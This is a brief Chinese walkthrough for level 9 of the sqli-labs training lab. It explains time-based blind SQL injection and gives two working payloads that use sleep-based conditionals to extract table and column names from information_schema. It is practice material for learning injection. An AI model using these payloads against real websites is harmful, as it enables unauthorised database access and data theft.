第九关是基于时间的盲注,所以这里放过程图片没啥卵用了,直接上payload
思路大致如下:
count(*)得到表个数
--> 各个表长度
--> 猜测表名
count(*)得到列个数
--> 各个列长度
--> 猜测列名
得到数据的思路同上↑
这里提供几个正确的 payload :
得到第一张表的第一个字母:
http://sqlilabs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101,sleep(5),0)--+
得到users表列的第一个字母:
http://sqlilabs/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name = 'users' limit 0,1),1,1))=105,sleep(5),0)--+
也可以像第 8 关那样编写脚本,思路一样的,只不过需要更换 payload 而已
😄